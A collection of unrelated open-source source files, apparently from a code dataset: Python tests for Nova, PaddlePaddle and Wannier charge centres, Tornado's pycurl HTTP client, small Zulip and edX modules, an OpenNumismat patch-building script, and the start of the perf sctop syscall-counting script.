move = random.uniform(-1, 1) / num_wcc
idx = random.randint(0, num_wcc - 1)
wcc_2[idx] += move
wcc_2[idx] %= 1
assert max_move(wcc_1, wcc_2) <= abs(move) + EPSILON
def test_single_move_equal_spacing(num_wcc):
"""
Test maximum move of a uniform shift on equally spaced WCC.
"""
wcc_1 = list(np.linspace(0, 1, num_wcc, endpoint=False))
wcc_2 = copy.deepcopy(wcc_1)
move = random.uniform(-1, 1) / num_wcc
idx = random.randint(0, num_wcc - 1)
wcc_2[idx] += move
wcc_2[idx] %= 1
assert (
abs(move) - EPSILON <= max_move(wcc_1, wcc_2) <= abs(move) + EPSILON
)
def test_move_all(num_wcc):
"""
Test a random move on all WCC.
"""
wcc_1 = [random.random() for _ in range(num_wcc)]
wcc_2 = copy.deepcopy(wcc_1)
real_max_move = 0
for idx in range(num_wcc):
move = random.uniform(-1, 1) / (2 * num_wcc)
real_max_move = max(abs(move), real_max_move)
wcc_2[idx] += move
wcc_2[idx] %= 1
assert max_move(wcc_1, wcc_2) <= abs(real_max_move) + EPSILON
|
CCI-MOC/nova
|
refs/heads/k2k-liberty
|
nova/tests/functional/api_sample_tests/test_cells.py
|
17
|
# Copyright 2012 Nebula, Inc.
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from six.moves import range
from nova.cells import rpcapi as cells_rpcapi
from nova.cells import state
from nova import db
from nova.db.sqlalchemy import models
from nova import exception
from nova.tests.functional.api_sample_tests import api_sample_base
CONF = cfg.CONF
CONF.import_opt('osapi_compute_extension',
'nova.api.openstack.compute.legacy_v2.extensions')
class CellsSampleJsonTest(api_sample_base.ApiSampleTestBaseV21):
extension_name = "os-cells"
def _get_flags(self):
f = super(CellsSampleJsonTest, self)._get_flags()
f['osapi_compute_extension'] = CONF.osapi_compute_extension[:]
f['osapi_compute_extension'].append(
'nova.api.openstack.compute.contrib.cells.Cells')
f['osapi_compute_extension'].append('nova.api.openstack.compute.'
'contrib.cell_capacities.Cell_capacities')
return f
def setUp(self):
# db_check_interval < 0 makes cells manager always hit the DB
self.flags(enable=True, db_check_interval=-1, group='cells')
super(CellsSampleJsonTest, self).setUp()
self._stub_cells()
def _stub_cells(self, num_cells=5):
self.cell_list = []
self.cells_next_id = 1
def _fake_cell_get_all(context):
return self.cell_list
def _fake_cell_get(inst, context, cell_name):
for cell in self.cell_list:
if cell['name'] == cell_name:
return cell
raise exception.CellNotFound(cell_name=cell_name)
for x in range(num_cells):
cell = models.Cell()
our_id = self.cells_next_id
self.cells_next_id += 1
cell.update({'id': our_id,
'name': 'cell%s' % our_id,
'transport_url': 'rabbit://username%s@/' % our_id,
'is_parent': our_id % 2 == 0})
self.cell_list.append(cell)
self.stubs.Set(db, 'cell_get_all', _fake_cell_get_all)
self.stubs.Set(cells_rpcapi.CellsAPI, 'cell_get', _fake_cell_get)
def test_cells_empty_list(self):
# Override this
self._stub_cells(num_cells=0)
response = self._do_get('os-cells')
subs = self._get_regexes()
self._verify_response('cells-list-empty-resp', subs, response, 200)
def test_cells_list(self):
response = self._do_get('os-cells')
subs = self._get_regexes()
self._verify_response('cells-list-resp', subs, response, 200)
def test_cells_get(self):
response = self._do_get('os-cells/cell3')
subs = self._get_regexes()
self._verify_response('cells-get-resp', subs, response, 200)
def test_get_cell_capacity(self):
self._mock_cell_capacity()
state_manager = state.CellStateManager()
my_state = state_manager.get_my_state()
response = self._do_get('os-cells/%s/capacities' %
my_state.name)
subs = self._get_regexes()
return self._verify_response('cells-capacities-resp',
subs, response, 200)
def test_get_all_cells_capacity(self):
self._mock_cell_capacity()
response = self._do_get('os-cells/capacities')
subs = self._get_regexes()
return self._verify_response('cells-capacities-resp',
subs, response, 200)
def _mock_cell_capacity(self):
self.mox.StubOutWithMock(self.cells.manager.state_manager,
'get_our_capacities')
response = {"ram_free":
{"units_by_mb": {"8192": 0, "512": 13,
"4096": 1, "2048": 3, "16384": 0},
"total_mb": 7680},
"disk_free":
{"units_by_mb": {"81920": 11, "20480": 46,
"40960": 23, "163840": 5, "0": 0},
"total_mb": 1052672}
}
self.cells.manager.state_manager.get_our_capacities(). \
AndReturn(response)
self.mox.ReplayAll()
|
jiangzhonghui/viewfinder
|
refs/heads/master
|
marketing/tornado/curl_httpclient.py
|
37
|
#!/usr/bin/env python
#
# Copyright 2009 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Non-blocking HTTP client implementation using pycurl."""
from __future__ import absolute_import, division, print_function, with_statement
import collections
import logging
import pycurl
import threading
import time
from tornado import httputil
from tornado import ioloop
from tornado.log import gen_log
from tornado import stack_context
from tornado.escape import utf8, native_str
from tornado.httpclient import HTTPResponse, HTTPError, AsyncHTTPClient, main
from tornado.util import bytes_type
try:
from io import BytesIO # py3
except ImportError:
from cStringIO import StringIO as BytesIO # py2
class CurlAsyncHTTPClient(AsyncHTTPClient):
def initialize(self, io_loop, max_clients=10, defaults=None):
super(CurlAsyncHTTPClient, self).initialize(io_loop, defaults=defaults)
self._multi = pycurl.CurlMulti()
self._multi.setopt(pycurl.M_TIMERFUNCTION, self._set_timeout)
self._multi.setopt(pycurl.M_SOCKETFUNCTION, self._handle_socket)
self._curls = [_curl_create() for i in range(max_clients)]
self._free_list = self._curls[:]
self._requests = collections.deque()
self._fds = {}
self._timeout = None
try:
self._socket_action = self._multi.socket_action
except AttributeError:
# socket_action is found in pycurl since 7.18.2 (it's been
# in libcurl longer than that but wasn't accessible to
# python).
gen_log.warning("socket_action method missing from pycurl; "
"falling back to socket_all. Upgrading "
"libcurl and pycurl will improve performance")
self._socket_action = \
lambda fd, action: self._multi.socket_all()
# libcurl has bugs that sometimes cause it to not report all
# relevant file descriptors and timeouts to TIMERFUNCTION/
# SOCKETFUNCTION. Mitigate the effects of such bugs by
# forcing a periodic scan of all active requests.
self._force_timeout_callback = ioloop.PeriodicCallback(
self._handle_force_timeout, 1000, io_loop=io_loop)
self._force_timeout_callback.start()
# Work around a bug in libcurl 7.29.0: Some fields in the curl
# multi object are initialized lazily, and its destructor will
# segfault if it is destroyed without having been used. Add
# and remove a dummy handle to make sure everything is
# initialized.
dummy_curl_handle = pycurl.Curl()
self._multi.add_handle(dummy_curl_handle)
self._multi.remove_handle(dummy_curl_handle)
def close(self):
self._force_timeout_callback.stop()
if self._timeout is not None:
self.io_loop.remove_timeout(self._timeout)
for curl in self._curls:
curl.close()
self._multi.close()
self._closed = True
super(CurlAsyncHTTPClient, self).close()
def fetch_impl(self, request, callback):
self._requests.append((request, callback))
self._process_queue()
self._set_timeout(0)
def _handle_socket(self, event, fd, multi, data):
"""Called by libcurl when it wants to change the file descriptors
it cares about.
"""
event_map = {
pycurl.POLL_NONE: ioloop.IOLoop.NONE,
pycurl.POLL_IN: ioloop.IOLoop.READ,
pycurl.POLL_OUT: ioloop.IOLoop.WRITE,
pycurl.POLL_INOUT: ioloop.IOLoop.READ | ioloop.IOLoop.WRITE
}
if event == pycurl.POLL_REMOVE:
if fd in self._fds:
self.io_loop.remove_handler(fd)
del self._fds[fd]
else:
ioloop_event = event_map[event]
# libcurl sometimes closes a socket and then opens a new
# one using the same FD without giving us a POLL_NONE in
# between. This is a problem with the epoll IOLoop,
# because the kernel can tell when a socket is closed and
# removes it from the epoll automatically, causing future
# update_handler calls to fail. Since we can't tell when
# this has happened, always use remove and re-add
# instead of update.
if fd in self._fds:
self.io_loop.remove_handler(fd)
self.io_loop.add_handler(fd, self._handle_events,
ioloop_event)
self._fds[fd] = ioloop_event
def _set_timeout(self, msecs):
"""Called by libcurl to schedule a timeout."""
if self._timeout is not None:
self.io_loop.remove_timeout(self._timeout)
self._timeout = self.io_loop.add_timeout(
self.io_loop.time() + msecs / 1000.0, self._handle_timeout)
def _handle_events(self, fd, events):
"""Called by IOLoop when there is activity on one of our
file descriptors.
"""
action = 0
if events & ioloop.IOLoop.READ:
action |= pycurl.CSELECT_IN
if events & ioloop.IOLoop.WRITE:
action |= pycurl.CSELECT_OUT
while True:
try:
ret, num_handles = self._socket_action(fd, action)
except pycurl.error as e:
ret = e.args[0]
if ret != pycurl.E_CALL_MULTI_PERFORM:
break
self._finish_pending_requests()
def _handle_timeout(self):
"""Called by IOLoop when the requested timeout has passed."""
with stack_context.NullContext():
self._timeout = None
while True:
try:
ret, num_handles = self._socket_action(
pycurl.SOCKET_TIMEOUT, 0)
except pycurl.error as e:
ret = e.args[0]
if ret != pycurl.E_CALL_MULTI_PERFORM:
break
self._finish_pending_requests()
# In theory, we shouldn't have to do this because curl will
# call _set_timeout whenever the timeout changes. However,
# sometimes after _handle_timeout we will need to reschedule
# immediately even though nothing has changed from curl's
# perspective. This is because when socket_action is
# called with SOCKET_TIMEOUT, libcurl decides internally which
# timeouts need to be processed by using a monotonic clock
# (where available) while tornado uses python's time.time()
# to decide when timeouts have occurred. When those clocks
# disagree on elapsed time (as they will whenever there is an
# NTP adjustment), tornado might call _handle_timeout before
# libcurl is ready. After each timeout, resync the scheduled
# timeout with libcurl's current state.
new_timeout = self._multi.timeout()
if new_timeout >= 0:
self._set_timeout(new_timeout)
def _handle_force_timeout(self):
"""Called by IOLoop periodically to ask libcurl to process any
events it may have forgotten about.
"""
with stack_context.NullContext():
while True:
try:
ret, num_handles = self._multi.socket_all()
except pycurl.error as e:
ret = e.args[0]
if ret != pycurl.E_CALL_MULTI_PERFORM:
break
self._finish_pending_requests()
def _finish_pending_requests(self):
"""Process any requests that were completed by the last
call to multi.socket_action.
"""
while True:
num_q, ok_list, err_list = self._multi.info_read()
for curl in ok_list:
self._finish(curl)
for curl, errnum, errmsg in err_list:
self._finish(curl, errnum, errmsg)
if num_q == 0:
break
self._process_queue()
def _process_queue(self):
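        # Hand queued requests to free curl handles until either the free list
        # or the request queue is exhausted.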
with stack_context.NullContext():
while True:
started = 0
while self._free_list and self._requests:
started += 1
curl = self._free_list.pop()
(request, callback) = self._requests.popleft()
curl.info = {
"headers": httputil.HTTPHeaders(),
"buffer": BytesIO(),
"request": request,
"callback": callback,
"curl_start_time": time.time(),
}
# Disable IPv6 to mitigate the effects of this bug
# on curl versions <= 7.21.0
# http://sourceforge.net/tracker/?func=detail&aid=3017819&group_id=976&atid=100976
if pycurl.version_info()[2] <= 0x71500: # 7.21.0
curl.setopt(pycurl.IPRESOLVE, pycurl.IPRESOLVE_V4)
_curl_setup_request(curl, request, curl.info["buffer"],
curl.info["headers"])
self._multi.add_handle(curl)
if not started:
break
def _finish(self, curl, curl_error=None, curl_message=None):
info = curl.info
curl.info = None
self._multi.remove_handle(curl)
self._free_list.append(curl)
buffer = info["buffer"]
if curl_error:
error = CurlError(curl_error, curl_message)
code = error.code
effective_url = None
buffer.close()
buffer = None
else:
error = None
code = curl.getinfo(pycurl.HTTP_CODE)
effective_url = curl.getinfo(pycurl.EFFECTIVE_URL)
buffer.seek(0)
# the various curl timings are documented at
# http://curl.haxx.se/libcurl/c/curl_easy_getinfo.html
time_info = dict(
queue=info["curl_start_time"] - info["request"].start_time,
namelookup=curl.getinfo(pycurl.NAMELOOKUP_TIME),
connect=curl.getinfo(pycurl.CONNECT_TIME),
pretransfer=curl.getinfo(pycurl.PRETRANSFER_TIME),
starttransfer=curl.getinfo(pycurl.STARTTRANSFER_TIME),
total=curl.getinfo(pycurl.TOTAL_TIME),
redirect=curl.getinfo(pycurl.REDIRECT_TIME),
)
try:
info["callback"](HTTPResponse(
request=info["request"], code=code, headers=info["headers"],
buffer=buffer, effective_url=effective_url, error=error,
request_time=time.time() - info["curl_start_time"],
time_info=time_info))
except Exception:
self.handle_callback_exception(info["callback"])
def handle_callback_exception(self, callback):
self.io_loop.handle_callback_exception(callback)
class CurlError(HTTPError):
def __init__(self, errno, message):
HTTPError.__init__(self, 599, message)
self.errno = errno
def _curl_create():
curl = pycurl.Curl()
if gen_log.isEnabledFor(logging.DEBUG):
curl.setopt(pycurl.VERBOSE, 1)
curl.setopt(pycurl.DEBUGFUNCTION, _curl_debug)
return curl
def _curl_setup_request(curl, request, buffer, headers):
curl.setopt(pycurl.URL, native_str(request.url))
# libcurl's magic "Expect: 100-continue" behavior causes delays
# with servers that don't support it (which include, among others,
# Google's OpenID endpoint). Additionally, this behavior has
# a bug in conjunction with the curl_multi_socket_action API
# (https://sourceforge.net/tracker/?func=detail&atid=100976&aid=3039744&group_id=976),
# which increases the delays. It's more trouble than it's worth,
# so just turn off the feature (yes, setting Expect: to an empty
# value is the official way to disable this)
if "Expect" not in request.headers:
request.headers["Expect"] = ""
# libcurl adds Pragma: no-cache by default; disable that too
if "Pragma" not in request.headers:
request.headers["Pragma"] = ""
# Request headers may be either a regular dict or HTTPHeaders object
if isinstance(request.headers, httputil.HTTPHeaders):
curl.setopt(pycurl.HTTPHEADER,
[native_str("%s: %s" % i) for i in request.headers.get_all()])
else:
curl.setopt(pycurl.HTTPHEADER,
[native_str("%s: %s" % i) for i in request.headers.items()])
if request.header_callback:
curl.setopt(pycurl.HEADERFUNCTION, request.header_callback)
else:
curl.setopt(pycurl.HEADERFUNCTION,
lambda line: _curl_header_callback(headers, line))
if request.streaming_callback:
write_function = request.streaming_callback
else:
write_function = buffer.write
if bytes_type is str: # py2
curl.setopt(pycurl.WRITEFUNCTION, write_function)
else: # py3
# Upstream pycurl doesn't support py3, but ubuntu 12.10 includes
# a fork/port. That version has a bug in which it passes unicode
# strings instead of bytes to the WRITEFUNCTION. This means that
# if you use a WRITEFUNCTION (which tornado always does), you cannot
# download arbitrary binary data. This needs to be fixed in the
# ported pycurl package, but in the meantime this lambda will
# make it work for downloading (utf8) text.
curl.setopt(pycurl.WRITEFUNCTION, lambda s: write_function(utf8(s)))
curl.setopt(pycurl.FOLLOWLOCATION, request.follow_redirects)
curl.setopt(pycurl.MAXREDIRS, request.max_redirects)
curl.setopt(pycurl.CONNECTTIMEOUT_MS, int(1000 * request.connect_timeout))
curl.setopt(pycurl.TIMEOUT_MS, int(1000 * request.request_timeout))
if request.user_agent:
curl.setopt(pycurl.USERAGENT, native_str(request.user_agent))
else:
curl.setopt(pycurl.USERAGENT, "Mozilla/5.0 (compatible; pycurl)")
if request.network_interface:
curl.setopt(pycurl.INTERFACE, request.network_interface)
if request.use_gzip:
curl.setopt(pycurl.ENCODING, "gzip,deflate")
else:
curl.setopt(pycurl.ENCODING, "none")
if request.proxy_host and request.proxy_port:
curl.setopt(pycurl.PROXY, request.proxy_host)
curl.setopt(pycurl.PROXYPORT, request.proxy_port)
if request.proxy_username:
credentials = '%s:%s' % (request.proxy_username,
request.proxy_password)
curl.setopt(pycurl.PROXYUSERPWD, credentials)
else:
curl.setopt(pycurl.PROXY, '')
if request.validate_cert:
curl.setopt(pycurl.SSL_VERIFYPEER, 1)
curl.setopt(pycurl.SSL_VERIFYHOST, 2)
else:
curl.setopt(pycurl.SSL_VERIFYPEER, 0)
curl.setopt(pycurl.SSL_VERIFYHOST, 0)
if request.ca_certs is not None:
curl.setopt(pycurl.CAINFO, request.ca_certs)
else:
# There is no way to restore pycurl.CAINFO to its default value
# (Using unsetopt makes it reject all certificates).
# I don't see any way to read the default value from python so it
# can be restored later. We'll have to just leave CAINFO untouched
# if no ca_certs file was specified, and require that if any
# request uses a custom ca_certs file, they all must.
pass
if request.allow_ipv6 is False:
# Curl behaves reasonably when DNS resolution gives an ipv6 address
# that we can't reach, so allow ipv6 unless the user asks to disable.
# (but see version check in _process_queue above)
curl.setopt(pycurl.IPRESOLVE, pycurl.IPRESOLVE_V4)
# Set the request method through curl's irritating interface which makes
# up names for almost every single method
curl_options = {
"GET": pycurl.HTTPGET,
"POST": pycurl.POST,
"PUT": pycurl.UPLOAD,
"HEAD": pycurl.NOBODY,
}
custom_methods = set(["DELETE", "OPTIONS", "PATCH"])
for o in curl_options.values():
curl.setopt(o, False)
if request.method in curl_options:
curl.unsetopt(pycurl.CUSTOMREQUEST)
curl.setopt(curl_options[request.method], True)
elif request.allow_nonstandard_methods or request.method in custom_methods:
curl.setopt(pycurl.CUSTOMREQUEST, request.method)
else:
raise KeyError('unknown method ' + request.method)
# Handle curl's cryptic options for every individual HTTP method
if request.method in ("POST", "PUT"):
request_buffer = BytesIO(utf8(request.body))
curl.setopt(pycurl.READFUNCTION, request_buffer.read)
if request.method == "POST":
def ioctl(cmd):
if cmd == curl.IOCMD_RESTARTREAD:
request_buffer.seek(0)
curl.setopt(pycurl.IOCTLFUNCTION, ioctl)
curl.setopt(pycurl.POSTFIELDSIZE, len(request.body))
else:
curl.setopt(pycurl.INFILESIZE, len(request.body))
if request.auth_username is not None:
userpwd = "%s:%s" % (request.auth_username, request.auth_password or '')
if request.auth_mode is None or request.auth_mode == "basic":
curl.setopt(pycurl.HTTPAUTH, pycurl.HTTPAUTH_BASIC)
elif request.auth_mode == "digest":
curl.setopt(pycurl.HTTPAUTH, pycurl.HTTPAUTH_DIGEST)
else:
raise ValueError("Unsupported auth_mode %s" % request.auth_mode)
curl.setopt(pycurl.USERPWD, native_str(userpwd))
gen_log.debug("%s %s (username: %r)", request.method, request.url,
request.auth_username)
else:
curl.unsetopt(pycurl.USERPWD)
gen_log.debug("%s %s", request.method, request.url)
if request.client_cert is not None:
curl.setopt(pycurl.SSLCERT, request.client_cert)
if request.client_key is not None:
curl.setopt(pycurl.SSLKEY, request.client_key)
if threading.activeCount() > 1:
# libcurl/pycurl is not thread-safe by default. When multiple threads
# are used, signals should be disabled. This has the side effect
# of disabling DNS timeouts in some environments (when libcurl is
# not linked against ares), so we don't do it when there is only one
# thread. Applications that use many short-lived threads may need
# to set NOSIGNAL manually in a prepare_curl_callback since
# there may not be any other threads running at the time we call
# threading.activeCount.
curl.setopt(pycurl.NOSIGNAL, 1)
if request.prepare_curl_callback is not None:
request.prepare_curl_callback(curl)
def _curl_header_callback(headers, header_line):
# header_line as returned by curl includes the end-of-line characters.
header_line = header_line.strip()
if header_line.startswith("HTTP/"):
headers.clear()
return
if not header_line:
return
headers.parse_line(header_line)
def _curl_debug(debug_type, debug_msg):
debug_types = ('I', '<', '>', '<', '>')
if debug_type == 0:
gen_log.debug('%s', debug_msg.strip())
elif debug_type in (1, 2):
for line in debug_msg.splitlines():
gen_log.debug('%s %s', debug_types[debug_type], line)
elif debug_type == 4:
gen_log.debug('%s %r', debug_types[debug_type], debug_msg)
if __name__ == "__main__":
AsyncHTTPClient.configure(CurlAsyncHTTPClient)
main()
|
chengduoZH/Paddle
|
refs/heads/develop
|
python/paddle/fluid/tests/unittests/test_save_model_without_var.py
|
2
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import warnings
import unittest
import paddle
import paddle.fluid as fluid
from paddle.fluid.layers.device import get_places
from paddle.fluid.executor import as_numpy
class TestSaveModelWithoutVar(unittest.TestCase):
def test_no_var_save(self):
data = fluid.layers.data(
name='data',
shape=[-1, 1],
dtype='float32',
append_batch_size=False)
data_plus = data + 1
if fluid.core.is_compiled_with_cuda():
place = fluid.core.CUDAPlace(0)
else:
place = fluid.core.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
fluid.io.save_inference_model(
dirname='test',
feeded_var_names=['data'],
target_vars=[data_plus],
executor=exe,
model_filename='model',
params_filename='params')
expected_warn = "no variable in your model, please ensure there are any variables in your model to save"
self.assertTrue(len(w) > 0)
self.assertTrue(expected_warn == str(w[0].message))
if __name__ == '__main__':
unittest.main()
|
jackrzhang/zulip
|
refs/heads/master
|
zilencer/forms.py
|
70
|
from django import forms
class EnterpriseToSForm(forms.Form):
full_name = forms.CharField(max_length=100)
company = forms.CharField(max_length=100)
terms = forms.BooleanField(required=True)
|
OpenNumismat/open-numismat
|
refs/heads/master
|
tools/make_patch.py
|
1
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import codecs
import json
import os
import sys
from PyQt5 import QtCore
from PyQt5.QtCore import QStandardPaths, Qt, QDateTime
from PyQt5.QtGui import QImage
from PyQt5.QtSql import QSqlTableModel, QSqlDatabase, QSqlQuery
from PyQt5.QtWidgets import QApplication, QFileDialog
from OpenNumismat.Collection.CollectionFields import FieldTypes as Type
sys.path.append('..')
from OpenNumismat.Collection.CollectionFields import CollectionFieldsBase
PATCH = [
{'action': 'add'},
{'action': 'add'},
{'action': 'add'},
{'action': 'add'},
]
SKIPPED_FIELDS = ('edgeimg', 'photo1', 'photo2', 'photo3', 'photo4',
'obversedesigner', 'reversedesigner', 'catalognum2', 'catalognum3', 'catalognum4',
'saledate', 'saleprice', 'totalsaleprice', 'buyer', 'saleplace', 'saleinfo',
'paydate', 'payprice', 'totalpayprice', 'saller', 'payplace', 'payinfo',
'url', 'obversedesigner', 'reversedesigner', 'barcode', 'quantity',
'features', 'storage', 'defect', 'note', 'status', 'createdat')
app = QApplication(sys.argv)
HOME_PATH = ''
__docDirs = QStandardPaths.standardLocations(QStandardPaths.DocumentsLocation)
if __docDirs:
HOME_PATH = os.path.join(__docDirs[0], "OpenNumismat")
# Path where application data (icons, templates, etc.) is stored
PRJ_PATH = os.path.abspath(os.path.join(
os.path.dirname(__file__), "..", "OpenNumismat"))
json_file_name, _selectedFilter = QFileDialog.getOpenFileName(None,
"Open collection", HOME_PATH,
"Collections (*.json)")
if json_file_name:
image_path = json_file_name.replace('.json', '_images')
json_file = codecs.open(json_file_name, "r", "utf-8")
data = json.load(json_file)
is_obverse_enabled = False
is_reverse_enabled = True
for density in ('MDPI', 'HDPI', 'XHDPI', 'XXHDPI', 'XXXHDPI'):
print(density, "started")
db = QSqlDatabase.addDatabase('QSQLITE', 'patch_' + density.lower())
file_name = json_file_name.replace('.json', '_patch_' + density.lower() + '.db')
db.setDatabaseName(file_name)
if not db.open():
print(db.lastError().text())
print("Can't open collection")
exit()
mobile_settings = {'Version': 1, 'Type': 'Patch'}
sql = """CREATE TABLE settings (
title CHAR NOT NULL UNIQUE,
value CHAR)"""
QSqlQuery(sql, db)
for key, value in mobile_settings.items():
query = QSqlQuery(db)
query.prepare("""INSERT INTO settings (title, value)
VALUES (?, ?)""")
query.addBindValue(key)
query.addBindValue(str(value))
query.exec_()
sql = """CREATE TABLE patches (
id INTEGER PRIMARY KEY,
action CHAR,
src_id INTEGER,
dst_id INTEGER)"""
QSqlQuery(sql, db)
sql = """CREATE TABLE photos (
id INTEGER PRIMARY KEY,
image BLOB)"""
QSqlQuery(sql, db)
sqlFields = []
fields = CollectionFieldsBase()
for field in fields:
if field.name == 'id':
sqlFields.append('id INTEGER PRIMARY KEY')
elif field.name == 'image':
sqlFields.append('image INTEGER')
elif field.name in SKIPPED_FIELDS:
continue
else:
sqlFields.append("%s %s" % (field.name, Type.toSql(field.type)))
sql = "CREATE TABLE coins (" + ", ".join(sqlFields) + ")"
QSqlQuery(sql, db)
dest_model = QSqlTableModel(None, db)
dest_model.setEditStrategy(QSqlTableModel.OnManualSubmit)
dest_model.setTable('coins')
dest_model.select()
height = 64
if density == 'HDPI':
height *= 1.5
elif density == 'XHDPI':
height *= 2
elif density == 'XXHDPI':
height *= 3
elif density == 'XXXHDPI':
height *= 4
coin_id = 0
for coin_data in data['coins']:
action = coin_data['action']
coin = dest_model.record()
for field in fields:
if field.name in ('id', 'image', 'obverseimg', 'reverseimg'):
continue
if field.name in SKIPPED_FIELDS:
continue
if field.name == 'updatedat':
currentTime = QDateTime.currentDateTimeUtc()
coin.setValue('updatedat', currentTime.toString(Qt.ISODate))
continue
if field.name in coin_data:
coin.setValue(field.name, coin_data[field.name])
image = QImage()
for field_name in ('obverseimg', 'reverseimg'):
if field_name in coin_data:
img_file_name = os.path.join(image_path, coin_data[field_name])
img_file = open(img_file_name, 'rb')
img_data = img_file.read()
img_file.close()
query = QSqlQuery(db)
query.prepare("""INSERT INTO photos (image)
VALUES (?)""")
ba = QtCore.QByteArray(img_data)
query.addBindValue(ba)
query.exec_()
img_id = query.lastInsertId()
coin.setValue(field_name, img_id)
if (field_name == 'obverseimg' and is_obverse_enabled) or \
(field_name == 'reverseimg' and is_reverse_enabled):
image.loadFromData(img_data)
image = image.scaledToHeight(height,
Qt.SmoothTransformation)
if not image.isNull():
ba = QtCore.QByteArray()
buffer = QtCore.QBuffer(ba)
buffer.open(QtCore.QIODevice.WriteOnly)
# Store as PNG for better view
image.save(buffer, 'png')
coin.setValue('image', ba)
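            # The branches below emit one or two 'coins' rows depending on the patch action
            # ('update_desc' adds the full record plus a stripped identifier-only copy;
            # 'update_img', 'add' and 'delete' each add a single record), and then log the
            # action in the 'patches' table.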
if action == 'update_desc':
dest_model.insertRecord(-1, coin)
coin_id += 1
for i in range(coin.count()):
if coin.fieldName(i) not in ('id', 'title', 'subjectshort', 'series', 'obversevar'):
coin.setNull(i)
dest_model.insertRecord(-1, coin)
coin_id += 1
elif action == 'update_img':
for i in range(coin.count()):
if coin.fieldName(i) not in ('id', 'title', 'subjectshort', 'series', 'obversevar',
'image', 'obverseimg', 'reverseimg'):
coin.setNull(i)
dest_model.insertRecord(-1, coin)
coin_id += 1
elif action == 'add':
dest_model.insertRecord(-1, coin)
coin_id += 1
elif action == 'delete':
for i in range(coin.count()):
if coin.fieldName(i) not in ('id', 'title', 'subjectshort', 'series', 'obversevar'):
coin.setNull(i)
dest_model.insertRecord(-1, coin)
coin_id += 1
if action in ('add', 'update_img'):
query = QSqlQuery(db)
query.prepare("""INSERT INTO patches (action, src_id)
VALUES (?, ?)""")
query.addBindValue(action)
query.addBindValue(coin_id)
query.exec_()
else:
query = QSqlQuery(db)
query.prepare("""INSERT INTO patches (action, src_id, dst_id)
VALUES (?, ?, ?)""")
query.addBindValue(action)
query.addBindValue(coin_id)
query.addBindValue(coin_id - 1)
query.exec_()
dest_model.submitAll()
db.close()
print(density, "done")
print("Processed %d coins" % dest_model.rowCount())
|
LearnEra/LearnEraPlaftform
|
refs/heads/master
|
lms/djangoapps/django_comment_client/settings.py
|
271
|
from django.conf import settings
MAX_COMMENT_DEPTH = None
MAX_UPLOAD_FILE_SIZE = 1024 * 1024 # result in bytes
ALLOWED_UPLOAD_FILE_TYPES = ('.jpg', '.jpeg', '.gif', '.bmp', '.png', '.tiff')
if hasattr(settings, 'DISCUSSION_SETTINGS'):
MAX_COMMENT_DEPTH = settings.DISCUSSION_SETTINGS.get('MAX_COMMENT_DEPTH')
MAX_UPLOAD_FILE_SIZE = settings.DISCUSSION_SETTINGS.get('MAX_UPLOAD_FILE_SIZE') or MAX_UPLOAD_FILE_SIZE
ALLOWED_UPLOAD_FILE_TYPES = settings.DISCUSSION_SETTINGS.get('ALLOWED_UPLOAD_FILE_TYPES') or ALLOWED_UPLOAD_FILE_TYPES
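# Illustrative Django settings override (keys match those read above):
#
#   DISCUSSION_SETTINGS = {
#       'MAX_COMMENT_DEPTH': 2,
#       'MAX_UPLOAD_FILE_SIZE': 5 * 1024 * 1024,  # bytes
#       'ALLOWED_UPLOAD_FILE_TYPES': ('.jpg', '.png'),
#   }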
|
mikshepard/android_kernel_samsung_klte
|
refs/heads/cm-12.1
|
tools/perf/scripts/python/sctop.py
|
11180
|
# system call top
# (c) 2010, Tom Zanussi <tzanussi@gmail.com>
# Licensed under the terms of the GNU GPL License version 2
#
# Periodically displays system-wide system call totals, broken down by
# syscall. If a [comm] arg is specified, only syscalls called by
# [comm] are displayed. If an [interval] arg is specified, the display
# will be refreshed every [interval] seconds. The default interval is
# 3 seconds.
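# Example invocations (matching the usage string below; 'firefox' is just an example comm):
#   perf script -s sctop.py              # all processes, 3 second refresh
#   perf script -s sctop.py 5            # all processes, 5 second refresh
#   perf script -s sctop.py firefox 5    # only syscalls made by 'firefox'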
import os, sys, thread, time
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import *
usage = "perf script -s sctop.py [comm] [interval]\n";
for_comm = None
default_interval = 3
interval = default_interval
if len(sys.argv) > 3:
sys.exit(usage)
if len(sys.argv) > 2:
for_comm = sys.argv[1]
interval = int(sys.argv[2])
elif len(sys.argv) > 1:
try:
interval = int(sys.argv[1])
except ValueError:
for_comm = sys.argv[1]
interval = default_interval
syscalls = autodict()
def trace_begin():
thread.start_new_thread(print_syscall_totals, (interval,))
pass
def raw_syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, args):
if for_comm is not None:
if common_comm != for_comm:
return
try:
syscalls[id] += 1
except TypeError:
syscalls[id] = 1
def print_syscall_totals(interval):
while 1:
clear_term()
if for_comm is not None:
print "\nsyscall events for %s:\n\n" % (for_comm),
else:
print "\nsyscall events:\n\n",
print "%-40s %10s\n" % ("event", "count"),
